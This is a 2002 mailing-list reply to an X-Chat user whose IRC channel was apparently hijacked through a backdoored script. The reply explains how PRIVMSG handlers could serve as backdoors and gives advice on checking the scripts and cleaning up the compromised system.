On Sun, 2002-03-24 at 02:43, Carsten Bauer wrote: > I was away from my desk for a few minutes, when I came back, i found this on > channel #Help on oz.org. > > Nobody had access to my computer, and I cannot see anything in my message > log that would show as a login or hack. > > > [18:22:10] --- Z has changed the topic to: (Numloxx) Numloxx security > services: 893718780 > [18:22:18] --- You are now known as owned > [18:22:21] --- Z sets ban on *!*@* > [18:22:21] --- Z removes channel operator status from owned > [18:22:21] --- Z removes channel operator status from Mark > [18:22:21] --- Z removes channel operator status from Nick > [18:22:21] <-- Z has kicked SlntMonk from #help ((owned) I lick tiktok's > muff.) > [18:22:21] --- You have been kicked from #help by Z ((owned) I lick tiktok's > muff.) Oh dear. Looks like this 'tiktok' fellow was able to convince your client to send arbitrary messages to the server. Not good. > I do not run any other scripts apart from: > > > [18:42:02] Registered Scripts: > [18:42:02] Sysinfo 0.2.4 > [18:42:02] Blackmore's reactor v.2.0 > [18:42:02] BitchX 0.1 > [18:42:02] tracer.pl 1.0 > [18:42:02] XMMS-Tool 1.1 > [18:42:02] DaNumber8-SayReverse 1.0 > [18:42:02] Inbound Handlers: > [18:42:02] PRIVMSG > [18:42:02] 315 > [18:42:02] 352 > > What are the inbound handlers exactly? I cant explain where it came from. > Could this be the exploit that made xchat do this? 315 and 352 are the /WHO reply stuff, as mentioned elsewhere in this thread. They're fine. The PRIVMSG handler scares me, though. That's the usual way for a backdoor to provide its 'service'. It's also a way for other (perfectly legitimate) scripts to serve requests from other clients, though, so don't assume it's a backdoor. For instance, if that 'Sysinfo' script will send system information to anyone who asks, then they'd probably ask by sending a PRIVMSG (or CTCP, which is handled by the PRIVMSG handler as well). As has been suggested elsewhere, I recommend that you take a good look over the scripts you're running, and insure that none of them contain a way for other people on IRC to send arbitrary commands to the IRC server. If they do, that's most likely how this 'tiktok' individual was able to take control of your channel. Note that there could be more than one backdoor per script, and there could be more than one script with one or more backdoors. Check them all thoroghly. Alternatively, you could instead opt to perform surgery with a chainsaw and not run any scripts at all. Note that if there are any backdoors in any of your scripts, they may very well allow access to the /exec command. If they do, then intruders can also run arbitrary shell commands. This is even worse, since they can then delete all your files, install more backdoors or trojans, run arbitrary programs on your computer, and so forth. If you're not running X-Chat as root, you could log in as root and do damage control on all parts of the system that are accessible to your non-root account. Don't use 'su', as it is possible that they've trojaned this command; instead, login from a virtual console, ssh from another machine, or reboot in single-user mode. Look through your system for anything that your non-root account has access to change; particularly, check your login scripts and crontab for suspicious changes. Search through your home directory for executables you don't remember putting there. In summary, figure out what this person did and reverse it. If you _are_ running X-Chat as root, then you'll have to format all your disks and install everything from scratch, since the damage that can be done by a compromised root is effectively irreversible. (This is why you don't want to run X-Chat as root.) Good hunting. Regards, Alex. -- PGP Public Key: http://aoi.dyndns.org/~alex/pgp-public-key -----BEGIN GEEK CODE BLOCK----- Version: 3.1 GCS d- s:++ a18 C++(++++)>$ UL+++(++++) P--- L+++>++++ E---- W+(+++) N- o-- K+ w--- !O M(+) V-- PS+++ PE-- Y+ PGP+(+++) t* 5-- X-- R tv b- DI D+++ G e h! !r y ------END GEEK CODE BLOCK------
This is a digitally signed message part